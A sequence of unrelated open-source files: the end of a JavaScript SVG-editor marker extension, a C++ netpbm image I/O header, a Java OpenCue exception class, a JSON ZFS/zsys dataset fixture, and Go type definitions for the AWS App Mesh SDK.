var marker_elems = ['line','path','polyline','polygon'];
while(i--) {
var elem = selElems[i];
if(elem && $.inArray(elem.tagName, marker_elems) != -1) {
if(opts.selectedElement && !opts.multiselected) {
showPanel(true);
} else {
showPanel(false);
}
} else {
showPanel(false);
}
}
},
// Re-sync arrowhead color whenever a marker-bearing element changes.
elementChanged: function(opts) {
var elem = opts.elems[0];
if(elem && (
elem.getAttribute("marker-start") ||
elem.getAttribute("marker-mid") ||
elem.getAttribute("marker-end")
)) {
// var start = elem.getAttribute("marker-start");
// var mid = elem.getAttribute("marker-mid");
// var end = elem.getAttribute("marker-end");
// Has marker, so see if it should match color
colorChanged(elem);
}
}
};
});
| {
"pile_set_name": "Github"
} |
/*
Copyright 2011, Ming-Yu Liu
All Rights Reserved
Permission to use, copy, modify, and distribute this software and
its documentation for any non-commercial purpose is hereby granted
without fee, provided that the above copyright notice appear in
all copies and that both that copyright notice and this permission
notice appear in supporting documentation, and that the name of
the author not be used in advertising or publicity pertaining to
distribution of the software without specific, written prior
permission.
THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
ANY PARTICULAR PURPOSE. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN
AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING
OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
*/
#ifndef _image_io_h_
#define _image_io_h_
#include <cstdlib>
#include <climits>
#include <cstring>
#include <fstream>
#include "Image.h"
#define BUF_SIZE 256
// Exception type thrown when a PNM (PBM/PPM) or VLIB stream is malformed
// (bad magic number or out-of-range maximum pixel value).
class pnm_error
{
};
// Loader/saver routines for netpbm images (binary PBM/PGM/PPM) and a
// private raw "VLIB" format. All Load* functions allocate a new image
// that the caller owns and must delete.
class ImageIO
{
public:
// Binary PBM (P4) bitmap; throws pnm_error on a malformed header.
inline static Image<uchar> *LoadPBM(const char *name);
// Binary PGM (P5) grayscale; returns NULL (does not throw) on error.
inline static Image<uchar> *LoadPGM(const char *name);
// Binary PPM (P6) color; throws pnm_error on a malformed header.
inline static Image<RGBMap> *LoadPPM(const char *name);
// NOTE(review): declared non-static unlike the rest of the API, so it
// requires an ImageIO instance to call — confirm whether this is intended.
template <class T>inline void LoadImage(Image<T> **im, const char *name);
inline static void SavePBM(Image<uchar> *im, const char *name);
inline static void SavePGM(Image<uchar> *im, const char *name);
inline static void SavePPM(Image<RGBMap> *im, const char *name);
// NOTE(review): also non-static; see LoadImage above.
template <class T>inline void SaveImage(Image<T> *im, const char *name);
private:
// Bit-level helpers for the packed 1-bit-per-pixel PBM payload.
inline static void read_packed(unsigned char *data, int size, std::ifstream &f);
inline static void write_packed(unsigned char *data, int size, std::ofstream &f);
// Reads the next whitespace-delimited header token, skipping '#' comments.
inline static void pnm_read(std::ifstream &file, char *buf);
};
// Unpack `size` bits from stream `f` into `data`, one byte per bit
// (MSB first), as used by the binary PBM pixel payload.
void ImageIO::read_packed(unsigned char *data, int size, std::ifstream &f)
{
	unsigned char byte = 0;
	int bit = -1;
	for (int i = 0; i < size; ++i)
	{
		// Refill the bit buffer whenever the previous byte is exhausted.
		if (bit < 0)
		{
			byte = f.get();
			bit = 7;
		}
		data[i] = (byte >> bit) & 1;
		--bit;
	}
}
// Pack `size` values (each 0 or 1) from `data` into bits, MSB first,
// writing each completed byte (and a final partial byte) to `f`.
void ImageIO::write_packed(unsigned char *data, int size, std::ofstream &f)
{
	unsigned char acc = 0;
	int shift = 7;
	int pos = 0;
	while (pos < size)
	{
		acc = acc | (unsigned char)(data[pos] << shift);
		--shift;
		// Flush when the byte is full, or when this was the last input value.
		if (shift < 0 || pos == size - 1)
		{
			f.put(acc);
			shift = 7;
			acc = 0;
		}
		++pos;
	}
}
/* read PNM field, skipping comments */
// Reads one whitespace-delimited header token from `file` into `buf`.
// Lines beginning with '#' (PNM comments) are consumed and discarded.
// file.width(BUF_SIZE) bounds the extraction so `buf` cannot overflow;
// the trailing ignore() consumes the single delimiter after the token.
void ImageIO::pnm_read(std::ifstream &file, char *buf)
{
char doc[BUF_SIZE];
char c;
file >> c;
while (c == '#')
{
// Discard the remainder of the comment line, then peek at the next token.
file.getline(doc, BUF_SIZE);
file >> c;
}
// Push the non-comment character back so the token is read whole.
file.putback(c);
file.width(BUF_SIZE);
file >> buf;
file.ignore();
}
// Load a binary PBM ("P4") bitmap; returns a new Image<uchar> with one
// byte per pixel (0 or 1). The caller owns the returned image.
// Throws pnm_error if the file cannot be opened or the header is invalid.
Image<uchar> *ImageIO::LoadPBM(const char *name)
{
	char buf[BUF_SIZE];

	/* read header */
	std::ifstream file(name, std::ios::in | std::ios::binary);
	if (!file)
		throw pnm_error();  // could not open the file; don't parse a dead stream
	pnm_read(file, buf);
	if (strncmp(buf, "P4", 2))
		throw pnm_error();  // wrong magic number

	pnm_read(file, buf);
	int width = atoi(buf);
	pnm_read(file, buf);
	int height = atoi(buf);

	/* read data: each row is bit-packed and padded to a byte boundary */
	Image<uchar> *im = new Image<uchar>(width, height);
	for (int i = 0; i < height; i++)
		read_packed(imPtr(im, 0, i), width, file);

	return im;
}
// Write `im` as a binary PBM ("P4") file: text header, then one
// bit-packed row per scanline.
void ImageIO::SavePBM(Image<uchar> *im, const char *name)
{
	const int w = im->width();
	const int h = im->height();

	std::ofstream out(name, std::ios::out | std::ios::binary);
	out << "P4\n" << w << " " << h << "\n";
	for (int row = 0; row < h; ++row)
		write_packed(imPtr(im, 0, row), w, out);
}
// Load a binary PGM ("P5") grayscale image with at most 8-bit samples.
// Returns a new Image<uchar> owned by the caller, or NULL if the file
// cannot be opened, the magic is wrong, or maxval exceeds UCHAR_MAX.
// (Note: unlike LoadPBM/LoadPPM, this function reports errors with NULL
// rather than throwing pnm_error — kept for caller compatibility.)
Image<uchar> *ImageIO::LoadPGM(const char *name)
{
	char buf[BUF_SIZE];

	/* read header */
	std::ifstream file(name, std::ios::in | std::ios::binary);
	if (!file)
		return NULL;  // could not open the file
	pnm_read(file, buf);
	if (strncmp(buf, "P5", 2))
		return NULL;

	pnm_read(file, buf);
	int width = atoi(buf);
	pnm_read(file, buf);
	int height = atoi(buf);

	pnm_read(file, buf);
	if (atoi(buf) > UCHAR_MAX)
		return NULL;  // samples wider than one byte are not supported

	/* read data */
	Image<uchar> *im = new Image<uchar>(width, height);
	file.read((char *)imPtr(im, 0, 0), width * height * sizeof(uchar));

	return im;
}
// Write `im` as a binary PGM ("P5") file with maxval UCHAR_MAX,
// followed by the raw one-byte-per-pixel payload.
void ImageIO::SavePGM(Image<uchar> *im, const char *name)
{
	const int w = im->width();
	const int h = im->height();

	std::ofstream out(name, std::ios::out | std::ios::binary);
	out << "P5\n" << w << " " << h << "\n" << UCHAR_MAX << "\n";
	out.write((char *)imPtr(im, 0, 0), w * h * sizeof(uchar));
}
// Load a binary PPM ("P6") color image with at most 8-bit samples into a
// new Image<RGBMap> owned by the caller.
// Throws pnm_error if the file cannot be opened, the magic is wrong, or
// maxval exceeds UCHAR_MAX.
Image<RGBMap> *ImageIO::LoadPPM(const char *name)
{
	char buf[BUF_SIZE];

	/* read header */
	std::ifstream file(name, std::ios::in | std::ios::binary);
	if (!file)
		throw pnm_error();  // could not open the file
	pnm_read(file, buf);
	if (strncmp(buf, "P6", 2))
		throw pnm_error();

	pnm_read(file, buf);
	int width = atoi(buf);
	pnm_read(file, buf);
	int height = atoi(buf);

	pnm_read(file, buf);
	if (atoi(buf) > UCHAR_MAX)
		throw pnm_error();

	/* read data */
	// NOTE(review): reading raw bytes straight into RGBMap assumes the
	// struct is exactly 3 packed bytes (no padding) — confirm in Image.h.
	Image<RGBMap> *im = new Image<RGBMap>(width, height);
	file.read((char *)imPtr(im, 0, 0), width * height * sizeof(RGBMap));

	return im;
}
// Write `im` as a binary PPM ("P6") file with maxval UCHAR_MAX,
// followed by the raw RGBMap pixel payload.
void ImageIO::SavePPM(Image<RGBMap> *im, const char *name)
{
	const int w = im->width();
	const int h = im->height();

	std::ofstream out(name, std::ios::out | std::ios::binary);
	out << "P6\n" << w << " " << h << "\n" << UCHAR_MAX << "\n";
	out.write((char *)imPtr(im, 0, 0), w * h * sizeof(RGBMap));
}
// Load an image stored in the library's private "VLIB" raw format:
// the magic token, ASCII width and height, then raw T-sized pixels.
// The new image is returned through *im; the caller owns it.
// Throws pnm_error if the file cannot be opened or the magic is wrong.
template <class T>
void ImageIO::LoadImage(Image<T> **im, const char *name)
{
	char buf[BUF_SIZE];

	/* read header */
	std::ifstream file(name, std::ios::in | std::ios::binary);
	if (!file)
		throw pnm_error();  // could not open the file
	pnm_read(file, buf);
	// The count 9 exceeds strlen("VLIB"), so strncmp stops at the
	// terminator and behaves like a full strcmp: tokens that merely
	// start with "VLIB" (e.g. "VLIBX") are rejected. Behavior kept.
	if (strncmp(buf, "VLIB", 9))
		throw pnm_error();

	pnm_read(file, buf);
	int width = atoi(buf);
	pnm_read(file, buf);
	int height = atoi(buf);

	/* read data */
	*im = new Image<T>(width, height);
	file.read((char *)imPtr((*im), 0, 0), width * height * sizeof(T));
}
// Write `im` in the private "VLIB" raw format: magic line, dimensions,
// then the raw T-sized pixel payload.
template <class T>
void ImageIO::SaveImage(Image<T> *im, const char *name)
{
	const int w = im->width();
	const int h = im->height();

	std::ofstream out(name, std::ios::out | std::ios::binary);
	out << "VLIB\n" << w << " " << h << "\n";
	out.write((char *)imPtr(im, 0, 0), w * h * sizeof(T));
}
#endif
| {
"pile_set_name": "Github"
} |
/*
* Copyright Contributors to the OpenCue Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.imageworks.spcue;
import org.springframework.core.NestedRuntimeException;
@SuppressWarnings("serial")
/**
 * Runtime exception thrown when a dependency operation fails.
 * Wraps the underlying cause (if any) via Spring's
 * {@link NestedRuntimeException} so the full chain is preserved.
 */
public class DependencyManagerException extends NestedRuntimeException {

    /**
     * @param msg detail message describing the dependency failure
     */
    public DependencyManagerException(String msg) {
        super(msg);
    }

    /**
     * @param msg detail message describing the dependency failure
     * @param cause underlying exception that triggered this failure
     */
    public DependencyManagerException(String msg, Throwable cause) {
        super(msg, cause);
    }
}
| {
"pile_set_name": "Github"
} |
{
"All": {
"rpool/ROOT/ubuntu_1234": {
"IsZsys": true,
"ID": "rpool/ROOT/ubuntu_1234",
"LastUsed": "2019-04-18T04:45:55+02:00",
"Datasets": {
"rpool/ROOT/ubuntu_1234": [
{
"Name": "rpool/ROOT/ubuntu_1234",
"Mountpoint": "/",
"CanMount": "on",
"BootFS": true,
"LastUsed": 1555555555
}
]
},
"AllUsersStates": {
"user1": {
"rpool/USERDATA/user1_abcd": {
"ID": "rpool/USERDATA/user1_abcd",
"LastUsed": "2018-12-10T13:20:44+01:00",
"Datasets": {
"rpool/USERDATA/user1_abcd": [
{
"Name": "rpool/USERDATA/user1_abcd",
"Mountpoint": "/home/user1",
"CanMount": "noauto",
"LastUsed": 1544444444
},
{
"Name": "rpool/USERDATA/user1_abcd/tools",
"Mountpoint": "/home/user1/tools",
"CanMount": "noauto",
"LastUsed": 1544444444
}
]
}
},
"rpool/USERDATA/user1_abcd@system-snapshot": {
"ID": "rpool/USERDATA/user1_abcd@system-snapshot",
"LastUsed": "2018-12-10T13:20:44+01:00",
"Datasets": {
"rpool/USERDATA/user1_abcd@system-snapshot": [
{
"Name": "rpool/USERDATA/user1_abcd@system-snapshot",
"IsSnapshot": true,
"Mountpoint": "/home/user1",
"CanMount": "noauto",
"LastUsed": 1544444444
},
{
"Name": "rpool/USERDATA/user1_abcd/tools@system-snapshot",
"IsSnapshot": true,
"Mountpoint": "/home/user1/tools",
"CanMount": "noauto",
"LastUsed": 1544444444
}
]
}
},
"rpool/USERDATA/user1_clone1": {
"ID": "rpool/USERDATA/user1_clone1",
"LastUsed": "2018-12-10T13:20:44+01:00",
"Datasets": {
"rpool/USERDATA/user1_clone1": [
{
"Name": "rpool/USERDATA/user1_clone1",
"Mountpoint": "/home/user1",
"CanMount": "noauto",
"LastUsed": 1544444444,
"Origin": "rpool/USERDATA/user1_abcd@system-snapshot"
},
{
"Name": "rpool/USERDATA/user1_clone1/tools",
"Mountpoint": "/home/user1/tools",
"CanMount": "noauto",
"LastUsed": 1544444444,
"Origin": "rpool/USERDATA/user1_abcd/tools@system-snapshot"
}
]
}
}
}
},
"History": {
"rpool/ROOT/ubuntu_1234@system-snapshot": {
"ID": "rpool/ROOT/ubuntu_1234@system-snapshot",
"LastUsed": "2018-12-10T13:20:44+01:00",
"Datasets": {
"rpool/ROOT/ubuntu_1234@system-snapshot": [
{
"Name": "rpool/ROOT/ubuntu_1234@system-snapshot",
"IsSnapshot": true,
"Mountpoint": "/",
"LastUsed": 1544444444
}
]
},
"Users": {
"user1": {
"ID": "rpool/USERDATA/user1_abcd@system-snapshot",
"LastUsed": "2018-12-10T13:20:44+01:00",
"Datasets": {
"rpool/USERDATA/user1_abcd@system-snapshot": [
{
"Name": "rpool/USERDATA/user1_abcd@system-snapshot",
"IsSnapshot": true,
"Mountpoint": "/home/user1",
"CanMount": "noauto",
"LastUsed": 1544444444
},
{
"Name": "rpool/USERDATA/user1_abcd/tools@system-snapshot",
"IsSnapshot": true,
"Mountpoint": "/home/user1/tools",
"CanMount": "noauto",
"LastUsed": 1544444444
}
]
}
}
}
}
}
}
},
"AllSystemDatasets": [
{
"Name": "rpool/ROOT/ubuntu_1234",
"Mountpoint": "/",
"CanMount": "on",
"BootFS": true,
"LastUsed": 1555555555
},
{
"Name": "rpool/ROOT/ubuntu_1234@system-snapshot",
"IsSnapshot": true,
"Mountpoint": "/",
"LastUsed": 1544444444
}
],
"AllUsersDatasets": [
{
"Name": "rpool/USERDATA/user1_abcd@system-snapshot",
"IsSnapshot": true,
"Mountpoint": "/home/user1",
"CanMount": "noauto",
"LastUsed": 1544444444
},
{
"Name": "rpool/USERDATA/user1_abcd/tools@system-snapshot",
"IsSnapshot": true,
"Mountpoint": "/home/user1/tools",
"CanMount": "noauto",
"LastUsed": 1544444444
},
{
"Name": "rpool/USERDATA/user1_clone1",
"Mountpoint": "/home/user1",
"CanMount": "noauto",
"LastUsed": 1544444444,
"Origin": "rpool/USERDATA/user1_abcd@system-snapshot"
},
{
"Name": "rpool/USERDATA/user1_clone1/tools",
"Mountpoint": "/home/user1/tools",
"CanMount": "noauto",
"LastUsed": 1544444444,
"Origin": "rpool/USERDATA/user1_abcd/tools@system-snapshot"
}
],
"UnmanagedDatasets": [
{
"Name": "rpool",
"Mountpoint": "/",
"CanMount": "off"
},
{
"Name": "rpool/ROOT",
"Mountpoint": "/ROOT",
"CanMount": "off"
},
{
"Name": "rpool/USERDATA",
"Mountpoint": "/USERDATA",
"CanMount": "off"
}
]
} | {
"pile_set_name": "Github"
} |
// Code generated by smithy-go-codegen DO NOT EDIT.
package types
import (
"time"
)
// An object that represents the access logging information for a virtual node.
type AccessLog interface {
isAccessLog()
}
// The file object to send virtual node access logs to.
type AccessLogMemberFile struct {
Value *FileAccessLog
}
// Marker method identifying this type as a member of the AccessLog union.
func (*AccessLogMemberFile) isAccessLog() {}
// An object that represents the AWS Cloud Map attribute information for your
// virtual node.
type AwsCloudMapInstanceAttribute struct {
// The name of an AWS Cloud Map service instance attribute key. Any AWS Cloud Map
// service instance that contains the specified key and value is returned.
Key *string
// The value of an AWS Cloud Map service instance attribute key. Any AWS Cloud Map
// service instance that contains the specified key and value is returned.
Value *string
}
// An object that represents the AWS Cloud Map service discovery information for
// your virtual node.
type AwsCloudMapServiceDiscovery struct {
// The name of the AWS Cloud Map namespace to use.
NamespaceName *string
// The name of the AWS Cloud Map service to use.
ServiceName *string
// A string map that contains attributes with values that you can use to filter
// instances by any custom attribute that you specified when you registered the
// instance. Only instances that match all of the specified key/value pairs will be
// returned.
Attributes []*AwsCloudMapInstanceAttribute
}
// An object that represents the backends that a virtual node is expected to send
// outbound traffic to.
type Backend interface {
isBackend()
}
// Specifies a virtual service to use as a backend for a virtual node.
type BackendMemberVirtualService struct {
Value *VirtualServiceBackend
}
// Marker method identifying this type as a member of the Backend union.
func (*BackendMemberVirtualService) isBackend() {}
// An object that represents the default properties for a backend.
type BackendDefaults struct {
// A reference to an object that represents a client policy.
ClientPolicy *ClientPolicy
}
// An object that represents a client policy.
type ClientPolicy struct {
// A reference to an object that represents a Transport Layer Security (TLS) client
// policy.
Tls *ClientPolicyTls
}
// An object that represents a Transport Layer Security (TLS) client policy.
type ClientPolicyTls struct {
// Whether the policy is enforced. The default is True, if a value isn't specified.
Enforce *bool
// One or more ports that the policy is enforced for.
Ports []*int32
// A reference to an object that represents a TLS validation context.
Validation *TlsValidationContext
}
// An object that represents the DNS service discovery information for your virtual
// node.
type DnsServiceDiscovery struct {
// Specifies the DNS service discovery hostname for the virtual node.
Hostname *string
}
// An object that represents a duration of time.
type Duration struct {
// A number of time units.
Value *int64
// A unit of time.
Unit DurationUnit
}
// An object that represents the egress filter rules for a service mesh.
type EgressFilter struct {
// The egress filter type. By default, the type is DROP_ALL, which allows egress
// only from virtual nodes to other defined resources in the service mesh (and any
// traffic to *.amazonaws.com for AWS API calls). You can set the egress filter
// type to ALLOW_ALL to allow egress to any endpoint inside or outside of the
// service mesh.
Type EgressFilterType
}
// An object that represents an access log file.
type FileAccessLog struct {
// The file path to write access logs to. You can use /dev/stdout to send access
// logs to standard out and configure your Envoy container to use a log driver,
// such as awslogs, to export the access logs to a log storage service such as
// Amazon CloudWatch Logs. You can also specify a path in the Envoy container's
// file system to write the files to disk. The Envoy process must have write
// permissions to the path that you specify here. Otherwise, Envoy fails to
// bootstrap properly.
Path *string
}
// An object that represents a gateway route returned by a describe operation.
type GatewayRouteData struct {
// The name of the service mesh that the resource resides in.
MeshName *string
// The name of the gateway route.
GatewayRouteName *string
// The virtual gateway that the gateway route is associated with.
VirtualGatewayName *string
// The specifications of the gateway route.
Spec *GatewayRouteSpec
// An object that represents metadata for a resource.
Metadata *ResourceMetadata
// The status of the gateway route.
Status *GatewayRouteStatus
}
// An object that represents a gateway route returned by a list operation.
type GatewayRouteRef struct {
// The name of the service mesh that the resource resides in.
MeshName *string
// The name of the gateway route.
GatewayRouteName *string
// The virtual gateway that the gateway route is associated with.
VirtualGatewayName *string
// The AWS IAM account ID of the service mesh owner. If the account ID is not your
// own, then it's the ID of the account that shared the mesh with your account. For
// more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
MeshOwner *string
// The AWS IAM account ID of the resource owner. If the account ID is not your own,
// then it's the ID of the mesh owner or of another account that the mesh is shared
// with. For more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
ResourceOwner *string
// The full Amazon Resource Name (ARN) for the gateway route.
Arn *string
// The version of the resource. Resources are created at version 1, and this
// version is incremented each time that they're updated.
Version *int64
// The Unix epoch timestamp in seconds for when the resource was created.
CreatedAt *time.Time
// The Unix epoch timestamp in seconds for when the resource was last updated.
LastUpdatedAt *time.Time
}
// An object that represents a gateway route specification. Specify one gateway
// route type.
// Only one of HttpRoute, Http2Route, or GrpcRoute should be set.
type GatewayRouteSpec struct {
// An object that represents the specification of an HTTP gateway route.
HttpRoute *HttpGatewayRoute
// An object that represents the specification of an HTTP/2 gateway route.
Http2Route *HttpGatewayRoute
// An object that represents the specification of a gRPC gateway route.
GrpcRoute *GrpcGatewayRoute
}
// An object that represents the current status of a gateway route.
type GatewayRouteStatus struct {
// The current status for the gateway route.
Status GatewayRouteStatusCode
}
// An object that represents a gateway route target.
type GatewayRouteTarget struct {
// An object that represents a virtual service gateway route target.
VirtualService *GatewayRouteVirtualService
}
// An object that represents the virtual service that traffic is routed to.
type GatewayRouteVirtualService struct {
// The name of the virtual service that traffic is routed to.
VirtualServiceName *string
}
// An object that represents a gRPC gateway route.
type GrpcGatewayRoute struct {
// An object that represents the criteria for determining a request match.
Match *GrpcGatewayRouteMatch
// An object that represents the action to take if a match is determined.
Action *GrpcGatewayRouteAction
}
// An object that represents the action to take if a match is determined.
type GrpcGatewayRouteAction struct {
// An object that represents the target that traffic is routed to when a request
// matches the gateway route.
Target *GatewayRouteTarget
}
// An object that represents the criteria for determining a request match.
type GrpcGatewayRouteMatch struct {
// The fully qualified domain name for the service to match from the request.
ServiceName *string
}
// An object that represents a retry policy. Specify at least one value for at
// least one of the types of RetryEvents, a value for maxRetries, and a value for
// perRetryTimeout.
type GrpcRetryPolicy struct {
// An object that represents a duration of time.
PerRetryTimeout *Duration
// The maximum number of retry attempts.
MaxRetries *int64
// Specify at least one of the following values.
//
// * server-error – HTTP status
// codes 500, 501, 502, 503, 504, 505, 506, 507, 508, 510, and 511
//
// *
// gateway-error – HTTP status codes 502, 503, and 504
//
// * client-error – HTTP
// status code 409
//
// * stream-error – Retry on refused stream
HttpRetryEvents []*string
// Specify a valid value.
TcpRetryEvents []TcpRetryPolicyEvent
// Specify at least one of the valid values.
GrpcRetryEvents []GrpcRetryPolicyEvent
}
// An object that represents a gRPC route type.
type GrpcRoute struct {
// An object that represents the action to take if a match is determined.
Action *GrpcRouteAction
// An object that represents the criteria for determining a request match.
Match *GrpcRouteMatch
// An object that represents a retry policy.
RetryPolicy *GrpcRetryPolicy
// An object that represents types of timeouts.
Timeout *GrpcTimeout
}
// An object that represents the action to take if a match is determined.
type GrpcRouteAction struct {
// An object that represents the targets that traffic is routed to when a request
// matches the route.
WeightedTargets []*WeightedTarget
}
// An object that represents the criteria for determining a request match.
type GrpcRouteMatch struct {
// The fully qualified domain name for the service to match from the request.
ServiceName *string
// The method name to match from the request. If you specify a name, you must also
// specify a serviceName.
MethodName *string
// An object that represents the data to match from the request.
Metadata []*GrpcRouteMetadata
}
// An object that represents the match metadata for the route.
type GrpcRouteMetadata struct {
// The name of the route.
Name *string
// Specify True to match anything except the match criteria. The default value is
// False.
Invert *bool
// An object that represents the data to match from the request.
Match GrpcRouteMetadataMatchMethod
}
// An object that represents the match method. Specify one of the match values.
type GrpcRouteMetadataMatchMethod interface {
isGrpcRouteMetadataMatchMethod()
}
// The value sent by the client must match the specified value exactly.
type GrpcRouteMetadataMatchMethodMemberExact struct {
Value string
}
// Marker method identifying this type as a member of the GrpcRouteMetadataMatchMethod union.
func (*GrpcRouteMetadataMatchMethodMemberExact) isGrpcRouteMetadataMatchMethod() {}
// The value sent by the client must include the specified characters.
type GrpcRouteMetadataMatchMethodMemberRegex struct {
Value string
}
// Marker method identifying this type as a member of the GrpcRouteMetadataMatchMethod union.
func (*GrpcRouteMetadataMatchMethodMemberRegex) isGrpcRouteMetadataMatchMethod() {}
// An object that represents the range of values to match on.
type GrpcRouteMetadataMatchMethodMemberRange struct {
Value *MatchRange
}
// Marker method identifying this type as a member of the GrpcRouteMetadataMatchMethod union.
func (*GrpcRouteMetadataMatchMethodMemberRange) isGrpcRouteMetadataMatchMethod() {}
// The value sent by the client must begin with the specified characters.
type GrpcRouteMetadataMatchMethodMemberPrefix struct {
Value string
}
// Marker method identifying this type as a member of the GrpcRouteMetadataMatchMethod union.
func (*GrpcRouteMetadataMatchMethodMemberPrefix) isGrpcRouteMetadataMatchMethod() {}
// The value sent by the client must end with the specified characters.
type GrpcRouteMetadataMatchMethodMemberSuffix struct {
Value string
}
// Marker method identifying this type as a member of the GrpcRouteMetadataMatchMethod union.
func (*GrpcRouteMetadataMatchMethodMemberSuffix) isGrpcRouteMetadataMatchMethod() {}
// An object that represents types of timeouts.
type GrpcTimeout struct {
// An object that represents a per request timeout. The default value is 15
// seconds. If you set a higher timeout, then make sure that the higher value is
// set for each App Mesh resource in a conversation. For example, if a virtual node
// backend uses a virtual router provider to route to another virtual node, then
// the timeout should be greater than 15 seconds for the source and destination
// virtual node and the route.
PerRequest *Duration
// An object that represents an idle timeout. An idle timeout bounds the amount of
// time that a connection may be idle. The default value is none.
Idle *Duration
}
// An object that represents the method and value to match with the header value
// sent in a request. Specify one match method.
type HeaderMatchMethod interface {
isHeaderMatchMethod()
}
// The value sent by the client must match the specified value exactly.
type HeaderMatchMethodMemberExact struct {
Value string
}
// Marker method identifying this type as a member of the HeaderMatchMethod union.
func (*HeaderMatchMethodMemberExact) isHeaderMatchMethod() {}
// The value sent by the client must include the specified characters.
type HeaderMatchMethodMemberRegex struct {
Value string
}
// Marker method identifying this type as a member of the HeaderMatchMethod union.
func (*HeaderMatchMethodMemberRegex) isHeaderMatchMethod() {}
// An object that represents the range of values to match on.
type HeaderMatchMethodMemberRange struct {
Value *MatchRange
}
// Marker method identifying this type as a member of the HeaderMatchMethod union.
func (*HeaderMatchMethodMemberRange) isHeaderMatchMethod() {}
// The value sent by the client must begin with the specified characters.
type HeaderMatchMethodMemberPrefix struct {
Value string
}
// Marker method identifying this type as a member of the HeaderMatchMethod union.
func (*HeaderMatchMethodMemberPrefix) isHeaderMatchMethod() {}
// The value sent by the client must end with the specified characters.
type HeaderMatchMethodMemberSuffix struct {
Value string
}
// Marker method identifying this type as a member of the HeaderMatchMethod union.
func (*HeaderMatchMethodMemberSuffix) isHeaderMatchMethod() {}
// An object that represents the health check policy for a virtual node's listener.
type HealthCheckPolicy struct {
// The amount of time to wait when receiving a response from the health check, in
// milliseconds.
TimeoutMillis *int64
// The time period in milliseconds between each health check execution.
IntervalMillis *int64
// The protocol for the health check request. If you specify grpc, then your
// service must conform to the GRPC Health Checking Protocol
// (https://github.com/grpc/grpc/blob/master/doc/health-checking.md).
Protocol PortProtocol
// The destination port for the health check request. This port must match the port
// defined in the PortMapping () for the listener.
Port *int32
// The destination path for the health check request. This value is only used if
// the specified protocol is HTTP or HTTP/2. For any other protocol, this value is
// ignored.
Path *string
// The number of consecutive successful health checks that must occur before
// declaring listener healthy.
HealthyThreshold *int32
// The number of consecutive failed health checks that must occur before declaring
// a virtual node unhealthy.
UnhealthyThreshold *int32
}
// An object that represents an HTTP gateway route.
type HttpGatewayRoute struct {
// An object that represents the criteria for determining a request match.
Match *HttpGatewayRouteMatch
// An object that represents the action to take if a match is determined.
Action *HttpGatewayRouteAction
}
// An object that represents the action to take if a match is determined.
type HttpGatewayRouteAction struct {
// An object that represents the target that traffic is routed to when a request
// matches the gateway route.
Target *GatewayRouteTarget
}
// An object that represents the criteria for determining a request match.
type HttpGatewayRouteMatch struct {
// Specifies the path to match requests with. This parameter must always start with
// /, which by itself matches all requests to the virtual service name. You can
// also match for path-based routing of requests. For example, if your virtual
// service name is my-service.local and you want the route to match requests to
// my-service.local/metrics, your prefix should be /metrics.
Prefix *string
}
// An object that represents a retry policy. Specify at least one value for at
// least one of the types of RetryEvents, a value for maxRetries, and a value for
// perRetryTimeout.
type HttpRetryPolicy struct {
// An object that represents a duration of time.
PerRetryTimeout *Duration
// The maximum number of retry attempts.
MaxRetries *int64
// Specify at least one of the following values.
//
// * server-error – HTTP status
// codes 500, 501, 502, 503, 504, 505, 506, 507, 508, 510, and 511
//
// *
// gateway-error – HTTP status codes 502, 503, and 504
//
// * client-error – HTTP
// status code 409
//
// * stream-error – Retry on refused stream
HttpRetryEvents []*string
// Specify a valid value.
TcpRetryEvents []TcpRetryPolicyEvent
}
// An object that represents an HTTP or HTTP/2 route type.
type HttpRoute struct {
// An object that represents the criteria for determining a request match.
Match *HttpRouteMatch
// An object that represents the action to take if a match is determined.
Action *HttpRouteAction
// An object that represents a retry policy.
RetryPolicy *HttpRetryPolicy
// An object that represents types of timeouts.
Timeout *HttpTimeout
}
// An object that represents the action to take if a match is determined.
type HttpRouteAction struct {
// An object that represents the targets that traffic is routed to when a request
// matches the route.
WeightedTargets []*WeightedTarget
}
// An object that represents the HTTP header in the request.
type HttpRouteHeader struct {
// A name for the HTTP header in the client request that will be matched on.
Name *string
// Specify True to match anything except the match criteria. The default value is
// False.
Invert *bool
// The HeaderMatchMethod object.
Match HeaderMatchMethod
}
// An object that represents the requirements for a route to match HTTP requests
// for a virtual router.
type HttpRouteMatch struct {
// Specifies the path to match requests with. This parameter must always start with
// /, which by itself matches all requests to the virtual service name. You can
// also match for path-based routing of requests. For example, if your virtual
// service name is my-service.local and you want the route to match requests to
// my-service.local/metrics, your prefix should be /metrics.
Prefix *string
// The client request method to match on. Specify only one.
Method HttpMethod
// The client request scheme to match on. Specify only one.
Scheme HttpScheme
// An object that represents the client request headers to match on.
Headers []*HttpRouteHeader
}
// An object that represents types of timeouts.
// NOTE(review): presumably PerRequest/Idle carry the same semantics as the
// corresponding GrpcTimeout fields — confirm against the App Mesh API docs.
type HttpTimeout struct {
// An object that represents a duration of time.
PerRequest *Duration
// An object that represents a duration of time.
Idle *Duration
}
// An object that represents a listener for a virtual node.
type Listener struct {
// The port mapping information for the listener.
PortMapping *PortMapping
// A reference to an object that represents the Transport Layer Security (TLS)
// properties for a listener.
Tls *ListenerTls
// The health check information for the listener.
HealthCheck *HealthCheckPolicy
// An object that represents timeouts for different protocols.
Timeout ListenerTimeout
}
// An object that represents timeouts for different protocols.
type ListenerTimeout interface {
isListenerTimeout()
}
// An object that represents types of timeouts.
type ListenerTimeoutMemberTcp struct {
Value *TcpTimeout
}
